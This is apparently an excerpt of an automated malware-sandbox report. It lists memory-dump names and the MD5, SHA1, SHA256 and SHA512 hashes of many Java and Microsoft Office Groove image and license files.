SHA1 44f65243eb459429e9d211db025e6cfc0ae9a67e
SHA256 35ee67934b321d71018d810616bda2b0b1687ca155a9a1654f82417d9b241e89
SHA512 9c49721f11d486212f42764e8fc857a65a3e80aabc7901ab0df6b860b8151ab1a8cd6b8e6cf6402f907aa12f28d6c4e900094b9db05927d850b255e8c51a4a46

memory/2212-24-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

memory/2516-38-0x0000000000400000-0x00000000006F6000-memory.dmp

C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif

MD5 f1b3fc5195c30349ce13afc21a40a06f
SHA1 1f51ed442a823175c935406748cae8c6d618027f
SHA256 2d6962dbb761594623f60e895127dc123f9e246f8845c9fdbd4dee8f945f6069
SHA512 6ab381d3d462308e2dcb73d04732340ca137c8464677d9ec0db43002e406d847f588e7ec15a164d93b557aacc06f149e92ad65de2d419f81f5a75703920f8ca0

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html

MD5 1d6c8d00aae68da0789330109f33c6a3
SHA1 5b6a622e617269a8fbe591f988ce9b6aecc3baa7
SHA256 f6eb04d8760c6d01bf408c45507fa182d2465800e46c2dc3cf8b71b59f511a81
SHA512 827685142c40781f9a4e0ccf68dbe4ab784a05cbeb1c7df1d6dffdadbc2a8de4b09e47eed31aae62e195081f6698cc27b520127b489dac11bb2f38d283faeaa2

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html

MD5 fec64b0080be113f3a329fbb2185a7ef
SHA1 9babc7facc8b38ab97344d61b735febde815b5c5
SHA256 6b1285f0594ae2551ccc66f1ba35ac410ecaecc58645ed375b7b56cfe3a98b56
SHA512 26a81b6de96119f0323de19933805086f6f58eea7b0f44eb8a5b35897264cc28cd2f8e35d38b2f4469afe4b1a782f1a4e8903abcf663e2326afc97df8a05166c

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

MD5 f344d4dba1cabd6f821a8b6260e44b0e
SHA1 30368cc2682f144b87713686ca60caddb989d222
SHA256 b9fab55ff249d16a87165233fd38a1d34214dde7003f8c5c319deb81cd514e36
SHA512 545686dfe13a4ce8de9a434877c238535fef6d1f4e9e03e75722e96803cf487efee20e1923ec74a27608cf1dacd3b20067a9aa39213f32494505f4c81f06d8f7

C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

MD5 7a0f570f1b04a822d4af7097b552861f
SHA1 1db485335ec5f38905a82a322994abf5881e3e9c
SHA256 586e03ac9aba339dbe88a0160a41ad292ae5865a393731027ccbb58334b43dfb
SHA512 7c6684f7143f82e71a69589f90d1a7af704786463f7d4624e27206dd4918cdab3dfcb00f5a24b03d37aa14b46d20b11161c7069c0138c011cf9ae08473cfc2cc

C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt

MD5 8a1a404d61b0c743b8ae97c9c849bf85
SHA1 adbb3e748b098560abb944ad8a862c26d4eed194
SHA256 3500ab5c93050534edcfa67ddaa080caf02ac1ddb7de820fc7bcba460f3f1c87
SHA512 b343073abf4890b7ab81b18657c04a9773744dad0f6e412eab975aa80f70d054fe210cd60e77aa443fef8a2ed4965cdea0b1048c81612af5e0534085d56592c1

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

MD5 87cefb82e0c0c8de490420228457e396
SHA1 da019e578d776573005db4b33282dd1b0b9a1707
SHA256 9b74ff61803ba2db58a442814e1b079a2b19590a8a23e6c9724468e94c3697e7
SHA512 a7de442e22dabeaab1d1813022c501d55cd1b40da0273f8777d14975337fcbb46a982729bc5578ad0494dac550298b7fc9e71d290fe306fde43244c6300a30e9

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

MD5 18dae81d6188757aff0bb5cd8db1acf2
SHA1 b424f6fa01a505b4b2b63b5a9eddcc1118b1f3b9
SHA256 982903208613c73959b691bd447d9c051bf8203fa6cd1908e3c741b164bcc11a
SHA512 49c6e2ad3892ef4e2e8bd9781bc7f09155899602b76346934be75afe2c3a72e43ff5527f6916fc6da34ba0e9ff8333f167e9eb99e26b80c3174f15470d118af0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF

MD5 dd267901fc9b2d13f272b569ca981f55
SHA1 52bba02b91956301ce96eff538b14abb2fe72487
SHA256 b668671fabe95bd8fa99e14c155d8bd6d57b18d12ae0576881195577ba995d4f
SHA512 28a6c31ffdcd253fb2da59662c87930c2774020b39bed4e7ed9fded27b40a31ab669eae78c127c4b7c96824bfbe8d75a8e44bd538d94de4b447ecab00403b760

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif

MD5 7c57732204c9ae51038991d4bc23984e
SHA1 b1b5686453f759fd6bd006027298ce0efe926bd8
SHA256 ea43998179bad0fcbd951eb9e7dcfeb2bad5ba73146df11141f1a91b9a8261ff
SHA512 84b58a93f97a6d1866bcb8835bfad37f28d371c8db8f30669b7685b01285556ecc548e30796a89725893b47b7374031e53a8e116f82eecae199e05724b5b3ab9

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif

MD5 bfa5645f12b664a8c4a19873dacb7891
SHA1 518eccf24ad3d4862d43ffa85baf0ceb2ccc9fd0
SHA256 64f8be06ee33e3ac44c03d367b3a903ff016cc7d978e52fe8b1c3b9fb5945a50
SHA512 123e74de5f063e48f9eb009fcc2c18ba247209b9db94b74e267c7738d023504a41e6db599a3dfb11a9da2cac8e88f03a2cfa2d1a3ef3d0cd2247e3e41872d61d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif

MD5 bf23aaaf4ac0ef0c6d29187155053036
SHA1 f35e77988728501a7695371f342bf7f5492de486
SHA256 aef7531ca1b1c41269f845949d2a33de6adfe4ee0fcdca9129fb11d37897c37f
SHA512 dd10bb54f8d70060fef2227c1a4bfdff5e178e598324a55f24f46ee57c57f069a8ce6cc45adab9a802bdd244243577b195d8511d1277ef837530debd7c260357

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif

MD5 dca47a4816b9334dfafc73ac42f8412a
SHA1 5b94865a1aeec4a0a0116ad7aea41ae8b50d363a
SHA256 c52e6c9d36b1b41cefe234549b2f96f7a65e8281851c8112607052c4c0ab3b82
SHA512 1ab316f2c0a1cac59c298e77260867642156488e84d1bad53507aad68e464490c0101b6ea0408cb8e1d38c27fe820fcbd4602830b134b497ced52a9c5e8730ec

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif

MD5 d31084eeb5e748028faf01f67a60643b
SHA1 99db7519c1c7edc14dec8fd453f698ad8a3dcdda
SHA256 98cb91a681d204a66740fbb9868aee363df4307e367077ab887fcb03485d64a8
SHA512 30c9d6c6070e395b8df8b27e460c5047647f7e214de9b43bfd51a67cba99f03149debcef45083424516b9d797caffb214f1131bc1cf319a8a25d0a9a30f5a362

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif

MD5 ab12094e7f872f1e7b0e926ca89da5b2
SHA1 f4af21df4859564188b66026c2591f53f50b2e98
SHA256 27dd924dbe93065f82dd434c06ba059185170a1ccf22c2b568e4f5ac33e9539b
SHA512 3f843f5fa467df7315a860d60d2d937970484602a282c282403a769fc02aa476ab060040a5d7cdad8d1a2fc6bba249a214d985c472b3368d4eb26264cad9f276

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif

MD5 2e8dc82a584dd87bee445d490cbce817
SHA1 ae9ef7384c22b231c1283ba96a848a8ca059cf46
SHA256 a15b3f04e031ba60201b262d5516d4f16df3fa5017be2302d7f60e7a72e55bd1
SHA512 d272b0d201a9abb01605f31ffb9e8d345613c2b900bba3bdd99f4703cf2990d583093c5b3f8e86fe256d3a8dcaab9695437ffcd1814db5f4855c39eb4813b51f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif

MD5 eeb0af363dc6edc8fad362e743b47936
SHA1 93e4fa04a75258b611693326d3383133060e8528
SHA256 4de94df4aaccc940cda249c329ccfd5489bdf595b887e2ba665671428d76faaa
SHA512 70748623f5073d0687a79459f94a637b45878da5d9e6bce25fce049d36e3855dae3f840253f3a570058224dc4c697109e6af53afe6113c2ad8871409ef561e0e

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif

MD5 fc0f397f9ed2fbde4d3c82868d84f592
SHA1 b923563bfa7a687d2af4a754e6a611be1c87671a
SHA256 0922cd587ea1cabab2726f8b2402ada0f389fff78dc55635035feeb218313cac
SHA512 bc1ea69af54f5c81ee8ec485458347a27141a7ec3872fc63720f6357f68a99746291e350c3c74920d147eb53833d8104f08e2fce55960dbea0f3ca97ae9c648d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif

MD5 7e8e32dda4d20382a8cc6e92d330033d
SHA1 6fa9837e64c9208c1415fcc205001871169a5b28
SHA256 70d44907de4fe1b01d15a4b8d27811cbaa0e3aa6333a2461bf70affc15b68c32
SHA512 9e70f8fa92ee1dbb392cd0cd80bb380877502d5afacfbd2d587d0e29acd617b264d2aeedec78e98c3031012df227ff71764c485aa8b8a9b23c5a26d2aa4eff30

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif

MD5 421a25d5fe24ef64034274056f0a4758
SHA1 ec9a767dabe20bb26da3955e69aa0ae5a8968368
SHA256 f4d56c3e6ead47049942110404d6697d9c074913649ffa111baf10dcb5c987a7
SHA512 e945fee0c83fc653ef98b5b9e857df272d1d9d599799184850a0aee6eb9a24fd9633b185f6ddd7ec4179d172ecef021e64641b9409917164e48137546595c9c4

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF

MD5 7fa34541619d37be4f0d2ed9342fd8ca
SHA1 b1dba7c212e36a8fd518308787b661ab7ba66e1b
SHA256 2486eb734ed2de398ccde861d201036860b7bbd26f94243ec692cceb3c0804da
SHA512 12d4da96ff5e89683b5d67bded100932cd265e86a787ff2365563eb77b25df528e5714be5497c0f320e5ae0a052f50366cb12408cb153e28fee5bee7addba722

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF

MD5 9262de6465e67e232093f1b69c6308f5
SHA1 1c8ac6443c46975afb12824a191ea3991e82ac2e
SHA256 e2f5835a7b30b9d92f34178436a979eb0c7c597e42366da14c6743570b5c4e7d
SHA512 4d0424ed55caac930d9f02e0c6b7a69d0f6d3d17e76430a1e6e2deef4e07a40017e3377f348194db29293a79f07c9a369a7a800ddcad9dc982fb4427ed8dc346

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF

MD5 23764a6b4a9412af319c5eda693f6f23
SHA1 634a9dec011deb1bf7f2fe9538993fa5bb1087f6
SHA256 ff05d2c86af5a5e3ce3a4583e6b78abcee64f4279b27e4e8581f1ddeeb4b4315
SHA512 6b943546ce9acaab30349265d085c8c3f77ae96c4e516bc5ee68b62ea14d42f0fa61302cb028358dc3f45c3c4ccc205b603d55bce38d025d096ea87722e0bfae

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif

MD5 cd5af548414f41d080df08313fb849b0
SHA1 f56d0478479fc5379e1d136f235950793fb8c730
SHA256 890310e10b9e252cfc072f580a1a4ac250e7ebd86a86717d26be294fb71abb9f
SHA512 024a50788ebca411fd3a3bc80d2faaf2cf401119cf1ccffaf0d06f4f3e7e840e47b68a18878475b721dc0257f1bbd3af1f2c21d1e6055ccb1a211a704a317d8b

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_on.gif

MD5 473b80c4bc025e928153a52d7521d4d5
SHA1 b697417dd29db6217148359c429900558c2c1c2f
SHA256 da8858b39bc2118c958a437911df15a147dfc36a5a09cf2524e83b93e13037e2
SHA512 aa23f43b3df33a814e86996ccd8f0c051e3b945c586493daae307827d8c37a4e7ddbf352765d85e043ad1223c9ee9a89ff19e1743d76c3eb85e744d855dde50f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg

MD5 5ad43b1349f8908a8cb047d5af02bbed
SHA1 ecb458c989c3bfd571358abcf4587a792205b488
SHA256 f4f46e26f7306ce4df20c08423d8b37668c375a208547ebe08f740c9a93f067c
SHA512 1d9032e347033b1adc55239b8859fd9ff4500c109414ca5399e5c9ad1b7f77e55621617ee1fd55f81581c68e83e084e6db3e68ea5d972f9f854a62812b32b529

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp

MD5 0baa41df5300cf3d169dc7c7674e703c
SHA1 491aa98464b5142920026768b6fa6dd5ef1fe8fd
SHA256 b1dd0f4261ae43ba437e6c5c569372165358dae0d19382094cf7c59b6a3d0c17
SHA512 e89f9632245a028f0670a646bc9445040aca1f4de8253c302c052a71a50f98e81cb19e3b22770953d2223c92360dff4493e54a4f7509b317e28a9b6423720ef2

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif

MD5 a1ffdb4a65e45f547055139c5c597925
SHA1 0bcb6798800e46b15257c2e98ee382982211808b
SHA256 52b1df2cce3df9619e1673df58b8bf3a69acc1343e27d63b325cec40b9584878
SHA512 7cbacf8faa5d727691d6eda1abd67ecff51f53da4e6e722719cb4aa94abd72bdee6dca9911d1c53e3f2c5d53c8aba497fb30d7d7ea2586a48327b819fdd12381

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif

MD5 9ee8f0948ebb035fedd89f64887da142
SHA1 12531d6d282df98fd80c478379d282776e264ebd
SHA256 2f828d2e3ed7813ed93c2dcb7b6c8e7d714ac0a9890fd8d700ed6b214c504122
SHA512 8eeaa59bec3b973e86651b3997e32fa86dbb88dda9844108de2fd688ca8eb4856646f30319b41b56d02a8eb5bc4fe3f9b1b98be5456ea5296c3d80be38cbd8b5

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF

MD5 48df60fea6f30037d3de7330157aba12
SHA1 313e4b669fe319d075995fec9f17391e760310d3
SHA256 56f25a02278bc29561bec799bc3791293284883dcac99afa3114c112d9b6bd0c
SHA512 a639d22f6f524232fb50df254cb5ce9b8c4b70686424f9596646e9ec7f7825a9e90585a08c5601b78a1d572791f1c31801a1590d9cbdb2c04886de783caaf4e8

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif

MD5 07df3b3b575cc49e5573cdde9f5dcc9e
SHA1 e6a516e5d5345f9a6d8c9ccd6b723a047e7a6b4c
SHA256 6be3af459f07154a136fe3aa491331a939a437a22dcf6504f5ee02c2c67e1a5e
SHA512 23b7bfc185d09477a7b21c0f5f07c6b2ccbabe377c95d30074abf8bdd9a1606fab5dad47fc7c6f26e72aa182c0cde78bdabc60a214b34e9c0e469090ab426ce6

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF

MD5 0a2977acc4e3560744244b7cbc497eda
SHA1 1cf8fef49e96008cf9403fa3bcc090cf26d154a9
SHA256 1d6e2d40d8962b3b96d5c50482c7f09b48cea06630a8e79b9b6551cc347c8638
SHA512 8f624cd51f49f1a74edd5465c7c3f4307afddd3fa6dedff1f1c0847dc10041881d5c4b0d75ec39da6499566f8e143f8d1f2998b4d25a9f2fca0b5d27891706e5

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF

MD5 983b4875e0028e8f008c6ec0ab8381f0
SHA1 381e4d70353b3a167a432879265a116bcca3e962
SHA256 274a750cd51f8786bf5731ecfadbcd4fabbcd38cc501b483b0e9ec1d0de18344
SHA512 04c0794bcee45558bb9f7d86e06cd85c5c98477ccb65151c81d9bcba39d2d5ad39cda2228bb08f6ed53ead64fd07a897120e08d8c383701cb0cce6bdf4e59c6d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF

MD5 94ab1d7d7d835d2622b8e944fde99909
SHA1 1c5e12d48e18257b503bff391fa744dfcb93b589
SHA256 f9d0526b2b694d025cf67d99254387c2e0d3848786d7c1ed0aa6bb36fda11e08
SHA512 4e6598b63d021c7bf33d6a0ef229944b5f41cb98289390593503957ef20e8051124c097fc82147cf6f5d5ec00c3c9fa343b506bf0bc46cf5a3451dcbcd303b75

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_OFF.GIF

MD5 b92eea701474e53118121e86c4036bce
SHA1 002fe90bf7e448af7f26bcccc130cd1625c53583
SHA256 50551988f7bffd873929cd3591e8b1431558955e6ea0ad6dac706bbf1f3a03d1
SHA512 a9ed6060494b7cd43955899026e5c2e4f98f6be70055ce7a98492752b56cddb3483d58ad8064dcb84b5d58e31c4d3b7848f7588b69986cfdc3e2edd47ed1490a

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF

MD5 c703c338fe74b0b88f22f0775a325c39
SHA1 8f07a7294797faf2d259b98573f0479bb0d8d85a
SHA256 e0b3214c217ee99ca5992236e599e59f3c5613b9ffc05f4b094232261948a0dc
SHA512 da5cd0c1999bdf854e4f818d0e4af89b7b57d4ec22cb254b3ea6bfabf7f3ba80a7658406d86eca57135cc5a0bed42a8d3dcfcedf7765f8cfb1c9f2a5cf26ff73

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF

MD5 db4f6ca1582690e6f6efb57613ba5b36
SHA1 5244d1dec5cda976f848bfaa7f7be38e0c7a6b19
SHA256 63212f74691529483a97c1e24fde1e092a9354b0de65a90140537004c029ccfc
SHA512 db1aa0f2320056e21cd3c4f09e84789fc06643cdde12ee2a50f5f046df39b98289a96cfd963f1bcd8397a711e510fa1c27adf41f6408d11ec2e030675dcbaa4f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF

MD5 bb39d747337310f374f2eb9fad53b7d4
SHA1 980928f38dcebcd02f4d24aef644309369d1a9ac
SHA256 8af7331b547bd25ee1a6a76cb5ec4f3d4c8487a1ef9d934a4c2c43a3f0cddd3b
SHA512 fe58dbca88cd5320897b05c45846f0a1e7d84d7232ec906a9b0a3616d2140eac06309e8b76a1982dd36ef04fae89ee2497380d6eddddde8f2123464172f3dd06

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_ON.GIF

MD5 49709e2982d15fc59dd453762943cb78
SHA1 e6a2568f1a0941420e63f30ad2fed295a7aa80f9
SHA256 5411026d13b25b541d98554422a112ec19a9c525d3b915c28de0e8ba755b14cf
SHA512 89a6a5e8ef720186b2dbd41f152562f31c5db321e555d599e1bb4604df920ab9b1e8cd98f1aea02614b2da91bbf3503e4a12fa989481f70fa6d20c24906331ac

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\background.gif

MD5 0a0386e072d54f6f575c4490647921e1
SHA1 88d3dd8d7636eb87370d2660a7f7525500ad2993
SHA256 a0ed803c79be15937007195fecebf222e256fa7f8aa9d93a72fd4b3293f8893b
SHA512 acfc3f04c9a0280d00b33451cbea5918236f53098ed805f3c3d5bb6e15f20d1f596f0e6b192e9c787562e58babb9136247051bc67d072d961eda321ed9732f5e

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF

MD5 0c5300cb08265748f1061fc958240e75
SHA1 2df61123d62e92991c725fc5a21b90f67b264cc2
SHA256 19dde572dede505071d1b92443a6f8547a8a47faa64ae7862d5df406aa3651d1
SHA512 48e75b43066a3d9cc4912f9c7c3a8157b8698fe15499a2d706a99a27df8b81ade146eca729bae97283d81a1e247302a279852810ea62d9de473ecbd7a11adc80

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif

MD5 e92f23ed957ddc116b912df99f7d37e3
SHA1 f8d412e5a30529b8dda23712026d1b062843ae73
SHA256 edec601608772c6175756eaccf631b5142c0ab858ca00b9ab4b2e390fa5b8db5
SHA512 880124f9adce776b824fe43c01e98761287de5b8b0b3c5fde8ac2131a86d00730f587695f836a5f968a0cfcdee0f3f13a72ccef9571ec8ff6f9417ccc4519b82

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\background.gif

MD5 7e8046c69886eaa56355bea6824878cf
SHA1 fdf50bf8bd76e3c6b5d086f263e703a6348f15b0
SHA256 3220c8a9c345b211339721c1c8d42ae619d3515c42d9af1608e5ace9ed709174
SHA512 df1e4e13e5fd0de2f8bca7bac1939561ca131ff0fb356323b2ad6059f2e834bdf4d68dbb970f645a3cbb40d9fee58ee4311b16847f7a59f8d9438c6f6b16de08

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg

MD5 1d840894829a3404e4bd7621e8a458f1
SHA1 5b1f0a1dd735c2d08171a5ade21130ebdfdc29a0
SHA256 72526b92f525eb5e878d0b2097945c2d820a3ee17e40f0b75f9b5b488db37866
SHA512 4d2ab0d1f6a1f5cf40bb5e9af0d2e50487e6188d1ce1f2570fe85b57e2cad72daa0ff6d67d9a8537f95bca800e3de3153083f4f6e6704dedbde27d0125ac23b7

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF

MD5 e9265f3141870eb134a036c8aa958b75
SHA1 dc01b4fe82cfef423fe448238259921a44b5c336
SHA256 fce5045f82bbf3d23e070b64cdce17071db695726672a8c6d40965b473eed8a6
SHA512 fa10e77dc55d067beb0d826c28ea7015946e7238d0137e85c8898e52b646d0ce1701b633b0370cf8e63206e4c17cb19d0489423c7c94a5a713bb48f9df3a44bc

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif

MD5 9f71b43e541891706cc6837144ce1b1a
SHA1 639837ea20667a90400e005bdf5145781580d3ec
SHA256 4ca4cfa3db7ea35e35d7698dd1a95913ee708e8715d3068313fa03046b718ed2
SHA512 b82e4fc6327d7e0f57244caaaace3b6c7da2d319a0a202983c1488a6c5cdf554830c2fc304eeec2aea5ddc7382772b32f35ef30cf5357ae455cf71a5c5d349c0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_italic.gif

MD5 2b530f1909ef6508468793ca346af87a
SHA1 935d68ce79e38351351d09d5d7841c1bdb18180a
SHA256 35c942a98d878de8e4eefc1e6e9e308d3c6716fbfd2f595785b6b6223289b97e
SHA512 039539c55bd6458b0bd5dba7c0a6fe17d2615fa49a018f7b39a42b42311cfacfa528b2abd59aff85e508d1ec51086547ef3965bab59c5d1d1f9efd0068d7000f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif

MD5 4773860ef2e8e093a305df240d32e441
SHA1 9754d448cb861565ac1b7187f3699f37f81844cc
SHA256 df6bd1ea4ba526fe89845a5b7088c2725951906037be3ece95a1d0065a8afae7
SHA512 a7164d72a593d89ef6102034ae89484b0131cfbeb004ca93664ec46178478fcfc50b9584ca4ffd855000e37643273aaaeb8d010972a7d0ee07edd54c4f22567d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg

MD5 b2af7ea47b87d65c87882ddbadfa8007
SHA1 9d80a199d967fbaa241f142855926f9e86c27a8d
SHA256 e4f4e4ccbe43fb4c44e52fde90c54df0090c1ccff517323b151e6fe4a2f835be
SHA512 7ce9377ff7402bacca0567f202619e7684d2cd09e3aa7ab901ee03de64a465ecc9285430dd42289e177cddb61340a6c84ff827c2fa9305154bc5fcb1fed90ba3

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF

MD5 0a1657a9cb30b999813f9c7e4263c9d3
SHA1 df186e26264921e7aa16b73b00417ad904cc5b1f
SHA256 4c36e153968d37979e51810188cd1d57f9f98251638afcfabc66af8f5b804a51
SHA512 f57432591a91fd5a44f66688c4ea59f73ecbee3a7d6f4dc9c838d16c361cc49ce32257a4448f18c8e30d8f905415d9a8c9860dc9a48f3830ad79d8e9b4a313f1

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\CALENDAR.GIF

MD5 ed3efceeb3c5fd9ec313e318834150fa
SHA1 fa85130a4a31b320a5b71c16ee85f5a3f4ea9dc1
SHA256 ebafe72a269f51fd6639b895e320e0b6bea7fb308ec2b9f85cde4fc04132e143
SHA512 371c960fb85435f60bc05b09036ecb1c162f9588e8c1eed39231357c648a3a92a7fe647f3df71feb565c711c74322b1d9ce74b8f71d44226a33fa617791eb16b

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF

MD5 ce0ff34a7234703bbbc75d035fae79f7
SHA1 a435a053fe6777c7081664337d03188e7a4044d1
SHA256 ad55192cf2dc42053b1a31e55fd94e69ed0207049fa091e19af1d3bd4a1ed4e1
SHA512 efe53dff066bb6a8f9a1b796e0a4a83c655622c0181ac151a6b29d5e0fafeacd1ae38b554b954767077fc1277fe15d1e7c9b63160b89cd2387f59e238ad71d8b

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF

MD5 cbe377fea6402a0b4a890ff1658fac7e
SHA1 1988481befd7adfe5e81326b7062dc3fb39069de
SHA256 c49d5dda8ca6f54a2593a7dd3b8b42d61d9dd467934dad4447583423d2d04ddf
SHA512 54b8863a543ab8d0f720519b9a1263163887e3233ed763a027e727aaa091e8c4a582f902b43d2ce656cbc5de94381da2728d0380a004315d0d6179ad6ebdb1a2

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg

MD5 d11cc5e046c8cbf1454cabab853d76a4
SHA1 1ee024df29955bb743f360dbaf194f825b9cf4fd
SHA256 2e9da456c3bd22655a6e23102bff3b81b1bfaf055223f727242d241c0d6a41ed
SHA512 007c341fc1609f76a8b4b4ba3ba821f92685c2e29a8b008971d0e56c4cf2c147cfbf8679ecf0153e208d93579dbc9aad92067f2e1e6c97b195b45bf3f5222433

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp

MD5 c81a127276890a5344c46b3bfde49d30
SHA1 052ef19dd587873d7b73081d048b2246a009b44e
SHA256 d1580acdc73a7e4a77be4f33cf7244426c4baf4f485c3b3d864ceeea63f8d286
SHA512 69675b5fbdb74748e13687e897cb9b7b647390f9b25f5e1a7fa945ae8c9762fd93551d2a5e5e7ea26ad1a646480051c6d40635e3d777edee78d5c991b03523cd

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF

MD5 531ae1c03a97556ee11aa29ce41f765a
SHA1 ff557c5af3e4b508615e98e15bb9e98c4d1840ce
SHA256 694cd38dfdf1e890f9cea2506457e025b8c753dd7f68926146fa2c1f42ec0fe6
SHA512 24b153c2b1807c143df68eb4ddf063150f3b8f7db1d841e1b2d5066f580156a51fa69b3a77d8aa581ab9937d7190bc8a380ea874798e74a8d56673b415552e37

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif

MD5 96bb151c67c9bf58b86b83d37e2eb39c
SHA1 0e4d18e769bb3f53b0acc3faaf1202005ac1920b
SHA256 0ca47f7c5d37efc7d5542620d6d17b7b515506bcc8f4a4e9aa5008673554dc76
SHA512 2bb69c57e96493658dd1f9d1681326334d0cdad4248c6208145ab83f17f47240928cd977a8a745caf9b2035aa0d8f1a9d185d4d9b9b2280ffb59ccc7f17d8ac9

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif

MD5 0fcbc6e2d85f1997c0804886e5411872
SHA1 df521fec1b914ddf0f7a3f8fb44e7d93c8fd0f6f
